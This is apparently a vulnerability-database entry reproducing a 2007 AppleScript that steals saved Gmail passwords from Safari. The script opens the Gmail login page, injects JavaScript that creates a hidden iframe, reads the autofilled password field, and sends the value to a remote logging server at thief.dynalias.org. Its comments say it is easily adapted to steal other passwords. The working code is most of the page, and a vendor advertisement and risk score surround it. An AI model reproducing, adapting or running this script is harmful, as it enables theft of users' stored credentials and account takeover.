Lucene search
gmailsteal_remote.scpt.txt
This script steals gmail keychained password by injecting Javascript into Safari, opens gmail login page, reads saved password, and sends it to a logging server using an hidden iframe
Show more
`-- This script can be used to steal gmail's keychained password by injecting
-- Javascripts into Safari. When executed it opens gmail's login page, reads
-- saved password and sends it to a logging server by creating an hidden iframe
-- into gmail's page. It can be easly modified to steal other pass.
-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007
--Your logging server
set LOGGING_URL to "http://thief.dynalias.org/log.php?p="
--Creates an hidden iframe into google's login DIV
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'"
--Stealing code
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"
--Open gmail login page
tell application "Safari"
open location "https://www.google.com/accounts/ServiceLogin?service=mail"
end tell
--Wait loading...
delay 10
--Create an hidden iframe to load LOGGING_URL
tell application "Safari"
do JavaScript HIDDENFRAME in document 1
end tell
delay 1
--Send password to LOGGING_URL
tell application "Safari"
do JavaScript JSTEAL in document 1
end tell
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo30 Sep 2007 00:00Current
7.4High risk
Vulners AI Score7.4